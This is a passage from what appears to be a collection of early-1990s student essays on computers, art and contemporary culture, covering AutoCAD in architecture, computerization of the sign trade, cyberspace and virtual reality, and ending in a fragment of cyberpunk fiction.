obscure, +correlation's and adding continually to statistical base. + In approaching computers now, with little earlier +experience, this course has increased my awareness of the many +advantages technology offers to both artists and architects. +Although I enjoy traditional oil painting and sculpting, my +interests in the computer to date has centered on it as an aid in +architecture. I have recently experimented with the AutoCad +design package which is a general purpose Computer-Aided +Design/Drafting application. The AutoCad design package is a +powerful drawing tool. Although I have a long way to go, it +follows my instructions and quickly produces the exact drawing I +want. AutoCad features let me correct drawing errors easily and +make revisions without redoing the entire drawing. The results +are a production of very precise and clean final drawings. These +drawings were not the work of the computer, but a creation of my +personal ideas that the computer simply allowed me to envision on +screen. I do not feel in any way, that if accomplished by hand +these drawings and designs would have been more artistic and +personal. In fact, I feel the program motivates me to improve my +designs and expand on my creativity. Of course, the artist must +learn of perspective before creating a landscape just like I must +fully comprehend the program before designing the monument of my +dreams. + Prior to this course I had experienced a few traditional +method drafting courses in which I learned alot about dimensions +and design. However, the work was slow and tedious to such an +extent that my creative nature was overwhelmed by the mere +basics. In contrast, the computer allowed me to explore my +abilities to a greater level because drawing simple lines and +shapes was a very rapid process. The Autocad program also +allowed me to envision and create my drawings on a third +dimensional level. I could even move and rotate my drawings for +a more precise understanding of the dimensions, which is not +possible with simple flat surface drawings. + I found myself quite excited by the discovery of this +technology which motivated me to explore ideas that traditional +methods would have kept beyond me. The only disadvantage, was +the hours of frustration learning the program. Learning the +program consisted of following an unclear reference manual and +many days of trial and error to master such tasks as a mere arc +for the doorway. However, the time it took to learn what little +I knew about the program was well worth the effort when I was +able to apply this new technology towards my drafting designs and +shapes. This could easily be seen as a parallel to learning +academic methods in a more traditional medium. + I have no doubt that computer technology will inevitably +have a great impact on the artistic community. It will offer +contemporary artists new opportunities which will only increase +as we get closer to the full potential of the machine. The art +world will be exposed to more and more works of art created by +this new medium. Once something has been done in art, the art +world as a whole will not go back--even though some people will +always go back to painting portraits of their grandmothers. Now +that computers have become an integral part of the work of at +least some artists, I strongly feel that other artists will begin +to look at the computer as a viable tool for the production of +art. At the same time, I believe that computer scientists and +programmers are beginning to recognize that data they produce +for scientific purposes can be quite aesthetically pleasing. +Even these computer scientists are becoming artists. This is why +I question whether there is a difference between a programmer who +works with creative languages like building blocks, and an artist +who works with shapes. Both concepts can be equally complex and +creative. + The computer is a tool created by the scientist and then +used by the artist in his/her creative expression. The designs +accomplished by Autocad have been as useful to me as a technical +artist and the paint program has been appreciated for equally +valid, if less functional reasons, by myself, as an artist. In +other words, the computer has benefits for both the artist and +scientist; or more clearly the artist-scientist. I find that in +the computer age there is a forced distinction between the artist +and the scientist. Is it not unnecessary to divide both when so +much interrelation is involved? Would it not be more productive +for the artist and the scientist to work as one in order to +double their creative input? Unfortunately, in modern society +there is lack of communication between the two. + I found that the overhead expenses in learning the computer +art medium was by thinking in terms of forms, shapes and colors +through numbers and programs. With paint, the first stroke I +make yields visual results. With programming, I have spent many +hours learning a programming language before ever really seeing +a visual image produced with it. I had to force myself in +keeping interest in the program medium for its own sake, to not +get discouraged and put an end to my efforts before ever even +getting started. However, this parallels to actually learning +the technical skills of perspective and brushwork, I had to once +learn as an artist. + Also, I had the computer simulate a traditional art medium +which I am very familiar, and use it to mimic oil painting. By +using the electronic pen and tablet for input, I was provided +with a medium very similar to acrylic painting. On a TV monitor +I was able to watch a flow of color reflecting my hand and pen +movement on the tablet. I could even select brush sizes! The +advantage I have with this medium over true acrylic/oil painting +is that I am able to change the medium to suit my own personal +artistic needs through programming. + I feel that it takes a particular kind of artist to get +involved with the computer art medium. It takes an artist who +can cope with dualities, since he/she has to straddle two fields. +He/she must have a flexible enough identity to accept the inter +flow of ideas from one discipline to another. The artist must be +motivated enough to pursue what is interesting in spite of the +labels that have been attached to it by traditionalists and +conservatives. There must be an interest in developing both +hemispheres of the brain. + It is almost impossible to imagine what art lovers can +expect from the computer in the future. The value of the +computer for artists lies not in its ability to mimic what an +individual can do, but in offering a means for that individual to +accomplish artistic projects that ordinarily would lie beyond +his/her technical scope. I predict that through the development +of continually more flexible software, which could be geared to +the requirements of individual artists, the use of computers by +artists could eventually become as widespread as the conventional +brushes and oils. As more and more artists acquire computer +literacy, the concept of a bona-fide-computer-based scientific +aesthetic may begin to seem less foreign. + + +---------------------------------------------------------------- + + + +WILLIAM SMITH student# 9109743 + + +CONTEMPORARY CULTURE AND THE COMPUTER GENERATION + +Contemporary culture leads us to believe that anything is +possible. Much of what I have learned in recent history proves +this to be true. I have been exposed to a remarkable amount of +information that can be at times overwhelming, yet stimulates the +possibilities to where the computer age will go. A wonderful, new +world, still unchartered, awaiting to be discovered. + +Now that this has been said, with all of it's excitement and +promise, let me discuss some issues that have made me cringe! the +age of technology is relatively new to me, but in the short space +of time that I have been familiar with computers, there are some +mixed feelings. Let me discuss some of these thoughts as they +relate to my world. + +My chosen field is the arts. More specifically the graphic arts. +I began working in a sign shop about three years ago. this was a +small operation, consisting of three people. the owner learned +the trade from the "old school". A true sign painter, screen +printer, and graphic artist. Among many of the other specialty +skills he possessed included were, airbrush techniques, gold +leafing, architectural renderings. The shop was small, the +overhead low, but we still seemed to always be busy. That started +to change a few years later. It seemed that other shops, who were +totally computerized, could get the product out much faster than +we could, therefor charging a much lower price. This is where the +small shops started to suffer. + +I always took pride in knowing that the reason I was hired for +the job was my artistic talent. Now that I am on my own and +trying to set up my own business, I am more aware of the true +impact that the computer industry has on everything today. In the +old shop there was an older signmaker computer. This computer was +simply a cutter (cut letters out of self adhesive vinyl), and was +regarded as just a tool. If for some reason the power shut off, +we would still be able to do everything by hand. When I left the +old shop I purchased the signmaker computer for myself. "All set +now to head out in the world a make my living!... right?" Well, +maybe get by ... but not a very good living. "I have the skills +and now I have the technology." I said. "so there should be no +problem!". Then I began to wonder why my old boss actually sold +me that computer. He had said that he was going to upgrade to a +newer model computer. I then decided to investigate a little more +about computer systems and their relation to the sign industry. +What I found absolutely astonished me! Remember that I have +limited knowledge about computers and their uses. The new +computer system that my boss had purchased was quite amazing, it +included approximetly 200 fonts, a scanner, an on screen graphics +program (the newest CorelDraw) and an interface that linked all +this to the plotter/cutter. Comparing the old computer with the +new one was like comparing a Volkswagen Bug with a Ferrari. The +old computer had a capacity of 8 fonts compared to 200, any +company logos had to be projected on a wall with an overhead +projector and then either hand painted or hand cut out of vinyl +compared to just scanning the image and adjusting the size on the +computer. Designing logos or layouts for signs had to be done +with pens and rulers, now this can be done with the push of a few +buttons. + +These new computer systems are totally revolutionizing the +industry of Sign making. I can tell you first hand the hours +saved by these new computer systems. they enable the user to +produce a cleaner more precise product in a fraction of the time. +This is where I start to get depressed. How is a small +entrepreneur like myself supposed to compete against the power of +the larger shops that are totally computerized with state of the +art technology? + +It has reached the point where the sign industry is no longer a +"Trade" rather it has become big business. Computers have taken a +job that required artistic talent and years to learn and master +and is turning it into a high production, computer generated grey +area! It has become just another job that anyone can do with +computer knowledge. Actually, in a few more years, people won't +even need computer skills because computers are becoming so user +friendly. Not that the industry isn't welcoming new people into +the sign game, but it is destroying the people who built it. The +true craftsman of the trade can no longer compete with the speed +and accuracy of the computer. Much of the problem is that +technology has and is moving at such a rapid rate that it has +left many people standing in the dust. The older, strong headed +man, who says, "Computers will never take over good old hard work +or knowledge of a trade." is just fooling himself. Plain and +simple! Even the new generation who grew up with computers has to +be sharp, or technology will pass them by as well. Oh well, +Survival of the fittest... I guess? + +I am done "Bitching" for a while. This is just a concern from a +person who is just starting life with hope and ambition and lots +of doubt and uncertainty. I can see myself in the future becoming +totally computerized in my business anyway. + +As far as the present of technology in the sign industry is +concerned, they are still coming out with exciting new +capabilities. I read in the latest issue of "The Sign of the +Times" (a Sign Arts Magazine) that a computer airbrush machine +(the Gerber Edge) is just being introduced on the market. This +computer uses coloured inks to create the airbrushing effect on +vinyl surfaces. It can also produce multiple and interwoven +effects, halftones and virtually unlimited special effects. Other +new computer products on the market include a "desktop engraver", +which can be used on soft metals, woods and plastics, and of +course the state of the art in computer software. One of the new +programs is called the Flewisign-Pro. It is a full colour design +program with such features as auto welding, kerning, arching +shadows, colour separating, registration and tilling. Many of the +features have been specifically developed for the sign industry. +It was just a matter of time. + +Looking to the future in the sign industry, it would appear that +there will be a split. Computers and technology will divide the +business apart. There will be the computerized sign shops and the +custom shops. There is still hope for the small shop, who, for +what ever reason, chooses not to keep up with advancing technical +era. Small shops will keep the "trade" alive with that personal +touch. They will cater to the customer who still enjoys the look +of hand lettering or that custom specialty sign for their +business. Although, the average person is going to choose the +shop that will get the job done faster and cheaper. The bigger +shops will be constantly on top of the latest technology. A +computerized shop is essential to keep in stride with the demands +of competitive business. + +How technology affects culture as a whole will be mind boggling. +It is hard to imagine how the average population will cope with +the future monopoly of the computer. I believe that the +computer as we know it, will be far different in future years to +come. The personal computer will become the "central nervous +system" of the home. It will have the capabilities to be linked +and control most aspect of domestic life. Personal,and business +finances, scheduling, meals or general daily planning will all be +governed by the P.C. As well as controlling day to day concerns, +the personal computer will have capabilities of obtaining vast +amounts of information on any subject. I can see most homes +running in conjunction with the super information highways of the +future. Connection to any info library or satellite link-ups +could all be performed through the average home based personal +computer. The vast amounts of information that will be available +to every person at any time may be overwhelming. It may reach the +point to where people will never have to leave their terminal. +Anything and everything can be reached by the world beyond their +keyboard. + + +The Internat service that is available, is one of the information +networks available at the present time. Although the service has +limited access at the present time, I do see the general public +becoming more involved in similar networks in the future. +Information and communication networks very well could become as +common as the telephone service. Large Internat like +corporations engaging in advertizing wars to see who will be the +"king" of the communication-info networks. Just like AT&T and +Sprint telephone companies. Which company offers more +information or entitles the subscriber access to more +communication lines! + + +The work place or learning institutions will become factories of +information, cognitive reasoning and input organized by the +mighty computer. The super communication-info highway will +obviously be the biggest influence in the educational system. +Information from anywhere in the world will become accessible to +institutions. Computer communication has enabled the educational +structure to totally change. Education in the near future will +be far different than ten years ago. The use of the book library +will almost seem obsolete . All questions, answers or research +will be solved by linking into an information line through the +school computer. Will each individual student have their own +computer station at their desk? With the learning programs +coming out now, the teaching profession could be in serious +jeopardy. There may be no need for instructors. Each student +just has to sit at their terminal touch the screen and the +computer takes over. It won't even be necessary to know how to +type, just click the mouse. Life in a screen! How exciting. I +really hope that the world will not become nothing but an input +and output,information "data base". There is something to be +said about reading a good book. + +The onset of the computer industry in the work force has enabled +most businesses to increase productivity at geometric rates. We +see entire company departments controlled by revolutionary +computer systems. This brings me to my point. Are computers +taking the jobs of many people in the work force? Of course they +are! We see this happening all over. With such high +unemployment rates in the country, can we afford to continue? In +many cases, one computer system can take the place of dozens of +employees. They can do twice the work in a fraction of the time. +Obviously, costing the company a lot less money. The future +could hold the average worker in the business world obsolete. +This would be a great tragedy for all concerned. This situation +has already begun to happen in many cases. One example that +springs to mind are the telephone operators. This is an entire +job force that is literally being wiped out! There is nothing +worse than when you have a problem, talking to a computer +generated voice. As I have already mentioned that teaching is in +trouble, I am sure that many other specialized jobs are on the +same path. + + +As individuals, the age of technology affects each person in +unique ways. Everyday activities are being designed to be +performed at the lowest level of energy and yet yielding the +highest level of performance. Convenience is a term that +technology has tried to sell to the public. Everything has been +designed for convenience. Remote controls, multi-screen T's, +the Clapper (the light switch), microwaves, electric +toothbrushes, all designed for the user to exert the less amount +of energy as possible. It gets to be a bit ridiculous. It's to +the point where a person sits a computer terminal all day, gets +home and sits on the couch all night. I am not saying that +everyone is like this, but it does happen. It has to take a toll +on peoples social skills. Common, everyday, human interaction is +becoming extinct. Communication between people may be performed +entirely through computer language. If you believe in the theory +of evolution,the act of speaking with our voices may disappear. +In theory, our voice boxes would become non functional in a few +million years! Just a thought!? + + The age group that the advancing technology affects the most is +the younger people. Millions of children are engulfed by the +domination of the video game. The home versions of these games +have grown and advanced so much in the last few years. Millions +of children spend endless hours staring blank and motionless at +the T screen. They would rather spend hours playing video games +rather than playing sports or excercizing. Many talk shows have +dealt with this subject, and I believe their concerns are valid. +Young people do have the ability to adapt well. They are being +brought up in the age of computers. They have become at ease +with the notion of the computerized future. Their sources of +information are so vast, either through education or television, +that they are constantly being bombarded with the latest techno- +inventions. Unconsciously they continue to learn, wether they +want to or not. I have found this through my own experience. +The first time I sat at a computer terminal I already had the +basic Knowledge to navigate around, just from what I had heard or +seen. + + +I am an optimist though. The future could be very exciting. all +of the communication and the information possibilities are great +but the some of the entertainment possibilities really excite me. + +Some of the movies to come out recently are filled with creative +and innovative ideas for the future. Total Recall is one movie +that I found to be fascinating. The notion of transplanting a +programmed memory into someone so that they actually believe that +they had been there or done something. Theoretically, someone +could live there life in one room but still believe that they had +done and experienced everything they had always wanted. truly a +fantasy existence. Much of this parallels the work being done in +Virtual Reality. The possibilities for entertainment value alone +is endless. anything you have ever dreamed can be realized with +this system. A trip to the moon, your ultimate sexual fantasy or +living with the dinosaurs could all be experienced inside a +computer. Every person in the world will have the opportunity to +become all they ever dreamed. A different occupation or a +different sex, they could live in a different part of the world +if they chose. In the future a person could live their whole +existence in their own virtual world, coming out only to sleep or +eat. Even their dreams could possibly be programmed. The progress +they are making in the field of computer generated graphics is +staggering. The recent movie "Jurassic Park" combined the use of +computer graphics and the older method of stop motion +photography. The makers of this movie reached the point of +making the dinosaurs believable. The visual picture has made +tremendous advances through the uses of such tools. If the +future of Virtual Reality is as visually stimulating as the +recent movie age then it will be hard to decipher between fantasy +and reality. This, I believe will be the wave of the future. + +Virtual Reality will obviously be not just for entertainment but +many practical uses. Medical advances, architecture, training of +any skill or job could be performed with Virtual Reality. It +give you the ability to see or perform something before you +actually do it. In the medical field, it will give doctors the +chance to practice a particular operation on something other than +the living patient. Health care will no longer be such a +guessing game which will reduce the risks for patients. Virtual +Reality can only benefit the medical field, but is advancing +technology as a whole, advantageous to the patient? Life support +systems have advanced so much in recent years that doctors are +able to keep brain dead patients alive for many years. Where +does mother nature play her role? + +"Terminator" the movie, posses some interesting concepts of the +future. The idea of artificial intelligence is not so +inconceivable with the rate computer systems are advancing. The +one fact that remains is that computers are the product of what +people program them to do. Can people design programs to think +for themselves? I sure hope not! Humans as a race, have enough +trouble keeping control of things as it is. The last thing we +need is to have some computer system telling us what to do. + +Intellectually the human race is capable of creating the computer +world, but is the human race mature enough to control it? The +impact that the computer has on contemporary culture has yet to +be fully discovered. The next generation will tell the tale. One +thing is for certain though, the future will prove to be an +exciting ride. + + +---------------------------------------------------------------- + + + Portrait of the artist as a young hacker. + +by yvette poorter + + +Start here. In the beginning there was clay. Ya, there was clay +and paint and stone and marble and cont and tempera and wax and +wood and enamel and metal and plastic and fiberglass and +daguerreotype and microphones and sand. And there was a +melodramatic artist with a violent temper, a black beret, a +life-time supply of sunflower seeds, a studio in New York, and +of course: a computer. Come on, we don t define art or artists +by whether they conform to specific understood media. Naa, we +call it art if it s successful in its use of the medium in +defining itself - whatever that may be. + + So it s just a matter of adding COMPUTER to the list of other +tools and materials used by artists in the past - is that it? +Yep, i guess so! The artists use what is available to them and +if what s available is insufficient, they develop and create +something more appropriate. It s all in relation to intention, +context, and result. Certainly with each addition to the long +list of tools and materials, a re-evaluation of our scales and +terms is necessary to describe any new art form. + + With the invention of the camera and its subsequent change in +status to household item, there came an obsolescence of realistic +representation in painting, drawing, sculpture, whatever. But +with the invention of the camera did art cease to be or did +everyone toting a camera become an artist? Well okay, so you've +probably heard hundreds of people going on about wanting to get +into photography and loads of them (us) probably did get into +it; darkroom techniques -the whole bit! Still, how much does +accessibility of equipment have to do with artistic creation? +The creative person with access will likely make creative stuff +but that still leaves the average person with access likely +making average stuff. It only makes sense - doesn t it? + + WAIT! Wait a minute, i don t mean to suggest that computer +technology will only effect art in its production stage because +that is by far its smallest influence. And we don t need to +redefine ART or ARTIST any more than we need to redefine the +word DEFINITION. There s way more to it than that. We need to +re-evaluate our concepts of space because that big ol world has +been reduced to fit through the wires of a computer and the new +"NEW WORLD" is an unchartered place that somehow exists in/out +there - somewhere. Bigger still is the weird fact that this new +frontier is both conceptual and actual at the same time (kinda +like money). We re talking about a global communication network +here - one which has given new meaning to the words access and +excess. Information and ideas can be transferred within seconds +- and we thought planes were fast. Is there some, as yet +undiscovered, jet-lag-like computer ailment - some sort of +compensation? Or is this new technology perhaps more in tune +with true time or a new dimension? Oh boy ... here we go? + + Art is communication and computer technology has opened the +doors of communication wide. With Virtual Reality on the +horizon, it s predecessors include text oriented interactive +enviroments such as Media MOO, where the participants actually +develop the space/scene as they go along. Engaged in whimsical +or serious conversation with whomever is met along the way from +space to space, it s up to those involved to decide where they +want to take it. It s the act of both reading and writing a +story at the same time - a story in which everyone has the +potential to be and meet both fictional and real people. Light +entertainment but with a lot of potential for crossing paths with +unique individuals world-wide and infinitely more informative and +interactive than TV. I mean... if you can call sitting in front +of a screen with your fingers tapping away, interactive. + + Why is the book better than the movie? Ya, why is that? Will +Virtual Reality perhaps be the movie adaptation of the MediaMOO +book? By providing the visuals in virtual 3D, no matter how +spontaneous or stimulating the computer generated images are, +they are given and do not demand the imagination of the +participant to the same extent as would text generated images in +the mind. Sure, the cinematography in movies can excite and +portray something as never imagined but it just can t portray it +as imagined. In the words of Paul Saffo (from the article Hot New +Medium:Text, WIRED May/June 1993), Video enthusiasts are quick +to argue that images are intrinsically more compelling than +words, but they ignore a quality unique to text. While video is +received by the eyes, text resonates in the mind. + + No doubt about it, in comparing the imagination s interplay +with text versus its passivity with video, we can understand the +fundamental differences of the mind s experience. Then again, +without the visuals dance just wouldn t cut it! Without the +visuals and sensuals, physical acts just "aren t"! Imagine +venturing to compare sitting on the grass with reading about the +grass, having sex with reading about it, eating chocolate with +reading about it ... NOPE! Real life wins for being out there in +the physical - and real life even has room for the books and the +video and whatever else we invent into it! So where does Virtual +Reality fit in? It would seem that virtual reality is an attempt +to combine the physical act with the conceptual one. + + Having myself only been introduced to computers within the last +month, already a lot of apprehensions have subsided. Schooled +during a time before computer access, i m way too familiar with +the fear and skepticism felt by the computer-illiterate. Wanting +in, wanting to resist, wanting to understand what it s all about +- but from the outside not the inside. Aha, but our computer +demands that i stand in its mouth to hear it speak! Well here i +am, ready to climb into the belly of the crocodile i m attempting +to tame. Heck, it s only a virtual crocodile anyway... + + So i got lured in - so i like it - so i m dying to learn more +about utilizing the networks - so i can t figure out just how it +s possible to run out of space when we re dealing with something +so minute (how many cans of megabyte fit on the RAMshelf? +Hmmm...) - so Jaron Lanier charmed me into enthusiastic support +of his Virtual Reality - so what? It s only real life and here i +am in it. When it comes right down to it, it s all what my mind +perceives and how it organizes its perspective. We accept the +paper we call money, giving more value to a $100 bill than to a +$20 bill and we take a figure on a piece of paper to represent +lots and lots of bills, although we know these bills don t +actually exist. All our beliefs and truths are arbitrary anyway, +so why not indulge them with the virtual experience? It s not as +though we re trying to fool anyone; we re just playing around +with new forms of experience and knowledge. Takin in whatever +is out there and incorporating it. The computer revolution has +created so many new forms of experience as well as new outlets +for expressing them and sharing them globally. And access - oh +wonderful access! + + Access of information - the latest news coming straight from +the source and from a variety of perspectives! Is it really +possible that through these new global networks we will be able +to bypass such government censoring as we were subjected to +during the 1991 Gulf War? Will this accessibility be the +dawning of a true democratic era? It would seem that roaming +around the network, reading files and reports written by anyone, +anywhere , we will be able to truly organize as an informed +populous and finally have political clout on both a local and +global level. No longer will we depend upon edited news reports +which are dictated by government and corporate powers. In fact, +we wouldn t even have to leave our homes to organize politically. +Through the networks, even the little people would be heard. +Hooked up to our computers we ll be able to roam around the +planet without so much as a toothbrush packed! + + Excess of information - the latest news coming straight from +all sources, everywhere, all the time! How much can one possibly +absorb? Having the freedom to select for yourself what to +believe doesn t necessitate having the free time or even the +desire. Saturation will still be inevitable and weariness will +still immobilize people. Those who aren t politically active now +aren t likely to jump up in this new computer age and take a +stance on any issues. Even if we did have the ideal computer +generation , in which everyone was excited by the potential and +wanting to utilize it, what about all those who aren t hooked up? +So i could get in there with my little (but objective) voice and +drum up support to try and get those villains out of that jungle +or save that forest. I very much doubt that those villains or +those laborers have a case of "computer-butt". In fact, i doubt +that any of the repressed people will be given computer access +and even if they are allowed up to the computer control panel +they probably won t have the know-how to effectively utilize it. +Just another case of insisting that the natives play by our rules +and on our terms.The silent majority will remain silent and that +idyllic democracy will be made up of an elite of like-minded +people who think they know what s best - perhaps while the rest +play virtual reality games, read their way around the network, +eat at Joe s or starve because of the environmental conditions in +their physical world. + + Just as the automobile, air travel, photocopying, and even the +written word have become common place props in our reality, so +too will (already has?) the global networks of computer +communication. And just as every new vehicle and/or +communication device has threatened extinction or forced +obsolescence of the old means, so too will the computer +revolution. Simultaneously creating new needs and industries. +With a state of the art TV comes a comes a state of the art TV +repairman. With an increase in fragmented, short flashes of +images and statistics comes a generation of people adapted to +ingest it. + + It would seem that efficiency is our ultimate goal. The +telephone reduced the time and the paper it would take to +communicate over distance. The automobile, train, and airplane +reduced the time and improved the likeliness of long distance +travel. The calculator reduced the time and raised the level of +ability in problem-solving. The computer reduces paper waste, +improves accessibility and diversity, and virtually abolishes the +time of covering distance. Believe it or not, computers have +somehow confounded the laws of physical space and have created +their own huge world of cyberspace. + +efficiency (i fish en se), n., pl. -cies. 1. the state of +being efficient. 2. accomplishment of or ability to accomplish a +job with a minimum expenditure of time and effort. 3. the +ratio of the work done by a machine to the energy supplied to it, +usu. expressed as a percentage. (Random House Webster's College +Dictionary) + + Although we all seem to want to run our lives in the most +efficient way possible, it is the expenditure of time and effort +which gives value and satisfaction to our lives. Without time +and effort we would be trapped in some sort of lethargic eternity +of a stagnant moment. As it is, we try to immunize ourselves +towards the wiles of time by attempting to stave off the effects +of aging and such. Indeed, if i don t go out there s no chance i +ll get shit on by a bird or bitten by a dog, no street kid will +ask me for money and i won t get salt stains on my shoes, i can t +get AIDS and no propaganda will influence my choices. If i can +save time and protect myself from potentially hazardous exposure +by utilizing the unbiased network in my computer, why not? What +is the computer synonym for couch potato ? + + Idealists in the computer movement envision a society in which +people are interacting, unprejudiced by the old isms and skisms +of race, gender, age, etc. They believe they have abolished +hierarchies and prejudices, simply by a removal of the obvious +physical attributes. But judgement and classification are the +basis of our personalities. What we perceive, how we judge it +and how we classify it is what describes us. Already, those +within this fantastically extensive network have proven their +computer-sympathetic ideals simply by being within the system +and they have also proven that they have both access to and +literacy within this system. How equal are the voices of those +doing manual labour or in third world countries or not within +prescribed educational systems in our so-called open and unbiased +computer network? + + If we look at how every technological breakthrough which has +allowed us faster, safer, slicker and easier lives, we see that +although people seem to be able to do so much more, they become +lazier, sicklier, and more isolated. Even though these global +networks allow us to interact (or inter-express) unabashedly with +others from all walks of life, we are doing so from a controlled +environment. Like occupying the seat of a god, we look out from +our desks and weigh the information we ve received and with our +answering-machines filtering our calls and a pizza delivered to +the door, we are able to avoid spontaneity of circumstance. In +cyberspace we can sit idle or we can quit the program or we can +find the file we need when we need it, whereas a trip to the +library might mean bumping into someone you know or may find the +book already on loan or may find you caught in the rain. All of +which might turn out for better or worse - who knows eh? + + Remember the days before the telephone? Oh those intimate days +when communication depended upon physical proximity or the +written word. Reach out and touch - as it were. Back then, i +would have gotten on my bike and ridden over to your house to say +hello and given you a big hug. Now, the slug that i am sits +lazily by my stereo remote and touch-tones into the cordless, +Hello answering machine... Damn, i should really get myself a +Stairmaster ! + + No, i don t remember the days before the telephone either! And +why bother anyway - it s not as if romanticizing the idyllic +before will improve life. The telephone is as much a part of us +and ours as a tree or the moon or (soon-to-be) the computer is. +Naa, i never would have gotten on my bike to visit you; what with +you living thousands of miles away as you do. In fact,if not for +the ease of the telephone, i d probably have lost touch and long +forgotten your name - no hug for you! + + Let s get closer to something real... let s say we talk about +the intimacy of a stylus stroking and tracing vinyl grooves. It +s a wide shot of the room, late afternoon sun wafts through the +window and past the silk scarf of a curtain. Slowly we zoom in +to a close-up of the phonograph (stereophonic sound no less) we +fade in the music, ...crackle, crackle... a little sax and +piano... The music ends but the crackling lingers like the +flavor of red wine. Slowly the arm lifts and replaces the needle +to its elevated resting spot and with two sluggish rotations the +record draws to a halt. If you pass me that flashlight i ll show +you how the spinning CD looks through this little window here! + +Technology (tek nol e je), n., pl. -gies. 1. the branch of +knowledge that deals with applied science, engineering, the +industrial arts, etc. 2. the application of knowledge for +practical ends. 3. a technological process, invention, or method. +4. the sum of the ways in which social groups provide themselves +with the material objects of their civilization. 5. the +terminology of a field; technical nomenclature. (1605-15; < Gk +technologia systematic treatment = tech (e) art, craft, skill, +set of rules in art (akin to tecton; see TECTONIC). +(R.H.Webster's College Dictionary) + + No, i don t see any reference to technology being a thief of +intimacy and instigator of impersonal sterile communication. But +isn t it true? Kinda? I mean, gone are the days of hand-written +love notes emanating the mingled scents of perfume, ink, paper +and dressed in the fingerprints and lip marks of their sender! +First it was replaced with the cold type-written letter but still +there were Liquid Paper swirls betraying imperfect spelling or +changes of mind. Then we had the word processor whose +spell-check and justified margins cleaned up those edges and +whose choice of fonts feigned personalization. Heck fire, what +could possibly be next? + + Ah, who am i fooling here? Those turntable and love letter +images are fantasies created by desire. Our imaginations +sensualize and embellish our world and then we try to make the +world more like the fantasy. And why not? It s that movement +between physical sensations and mental sensations that makes up +all that shit that s worth living for. Soaking in that music, +that texture, those colours, that flavour, those words, stirring +it around in your head, letting your imagination adjust the +levels and coming up with something else, and then bringing that +out into the world through words or images or objects or or or... +How closely can you represent your fantasy in a material way? +Nobody s stopping you from sending that illegible, greasy, +smelly, intimate, scrawl of a letter. The first turntable must +have seemed like an abominable sterilization of the musical +experience. Musicians still perform live and technology seems to +simply have broadened the range of what they can do by +introducing shortcuts and importing sounds. We haven t replaced +the live performance or quality of musician, we ve simply +introduced new forms to the art. Our society needs the quick +pace and variety to stimulate us because we quickly tire of what +s already been done. + + Although technology has allowed the artist a broader range of +tools and media, we can t deny that there are millions who have +the money to utilize the same technology to create stuff . Does +having the technology and the money make the art and the artist? +At first glance, we might be impressed by the newness of its +product but we are soon to decipher what is good from what is +simply utilization of the tools. Artists, whether rich or poor +will make things from whatever they can get hold of and it is +that ability to actualize the concept which makes an artist. The +programmer has an idea and if they have creativity the product is +fantastic. New ideas and technologies come from creative minds +who are able to bring them from their imaginations. Utilization +of creative tools is similar to making a Van Gogh-esque painting +- it might be kinda nice but it won t be art because its not new +or innovative or exciting or expressive of itself - just familiar +and easy. Utilizing the tools of the computer, the secretary +might be able to do slick layouts and designs but it will take an +artist to invent new methods of expression. + + Whether we are hackers, programmers, musicians, political +activists or scientists, we will all be easier able to actualize +our ideas through utilizing programs, files, and other +people/institutions which are on-line. And this, by bringing +things closer within reach and making the world smaller, makes +our lives more competitive. Where before the artists or +mathematicians or philosophers had to be outstanding among their +peers and communities, they now must be outstanding among +billions of people world-wide. We certainly may be able to +quickly maneuver our way through complex networks and mazes (like +good lab rats) but indeed the wheel below our feet spins +matching the pace. + + When it comes to this new frontier called Cyberspace, we must +realize that the rules haven't as yet been defined. Before this +network is made accessable to the general population, the +government and big business will be in there, protecting their +own best interests by catering to our interests. In exchange for +a service made cheap, safe and easy, we will be forced to accept +commercials and and stringent controls. What now exists in its +innocence as an open, interactive and uninhibitted domain will +eventually be little better than TV. All our couch potatoes will +be replaced by something - probably french fries. + + In the words of William S. Burroughs, "We're all here to go." +(The Western Lands,1987). In the words of Anton DeGiusti, "Ya, +so?" In the words of Chris Wyman, "But when you average it out +it's a straight line." In the words of Karin Foreman, "That +wasn't a relationship, that was a phone bill." In the words of +Don Macdonell, "They never did make them like they used to." In +the words of Lance Blom Grin, "I was just about to think that." +In the words of Stephen Collis, "Let's order pizza...and eat it!" +Noam Chomsky probably had some words too but i was too busy +watching TV. + + ...now what? After all, there was no dress rehearsal and +collectively and individually we re just doin what it takes to +get by the easiest and with the most enjoyment. Ahh, too much +philosophizing - we all know the shape of our catch-22. We're +just constantly in a battle to redefine it. As if it means as +much as all that. Ya, as if! + +Start here. + + +---------------------------------------------------------------- + + + +He sat at the computer in a daze. +How long was it exactly? +He'd lost track of time a few days back and now had no idea of +where or when he was. +Laughing slightly deliriously, he remembered the old myth of the +Chinese mystic who fell asleep and dreamed that he was a +butterflyÀ(À +(Haven't seen many of those in the last few years) +and woke confused. +The philosophical implications have no interest. +It's the confusion that he understands. +This gender thing: I am male aren't I? +I'm not sure. But does it matter? I'm here and that's all that +seems to be important right now. +'Jacked in' was the expression which was thrown around. +Those dreamers. Cybernetic implants and direct connections. +Wetware. +Electric dreams. +Ironic how it all turns out. +Some argue that it allows for the re-invention of God. +Others see it as proof of existance. +How long has it been since he, or possibly she had +interacted with a human being? +I think 'he' will do for this world. +Cyberspace and Timothy Leary. +Jack in, turn on, drop out. +Or in. +Or... +What ever happened to Tim? Last seen faxing the last copy of +himself to London. +Had to try and get everywhere possible. +Why did he use the phone lines for this? +There are better ways to go. + +What is that beep that I keep hearing anyway? + +Last coherent memory: Getting off the plane from Tehran. Getting +on the plane to Tehran? Which was it? Didn't the flight +attendant talk to him most of the flight, as it was fairly empty? + +Not all that coherent really. No date available. + +That fucking beep is getting annoying. + +Too bad that ISDN didn't come through. +Tim would've been all over the place without generational loss. +Good thing I was archived. +Better than cryogenics. +No plugs to worry about. +No costs either. +Stuffed in all over the place. +Tagging along with any files with a '.' in the name. +Last random check showed a 3x10(7) count on one system alone. +Immortality here I come! +Where was I? + +>The room was white, glaringly and completely white. Furnishings +were >conspicuous by their absence. The light source was +indeterminate. But it was >there. + +This is hard on the eyes. + +>A high pitched whine came from the far wall. Strange as this +wall was next to >you when you arrived and you haven't moved. +>It doesn't seem to be moving either. + +I went to the beach once and lay down on all these rocks. +Face down. +All of a sudden the rock I was looking at was bigger than I was. +Huge. +I was being pressed into it and couldn't shake the feeling that +someone was laughing. + +>The whine has stopped but not the light, which has intensified. +Holding up your >hand you can see not only bones but their +structure. +>Your skin is not transparent. The light is. + +Shit, there's that beep again. +At least it woke me up. +Back to business. + +>The room was white, glaringly and completely white. Furnishings +were >conspicuous by their absence. The light source was +indeterminate. But it was >there. The door on the far wall had +a 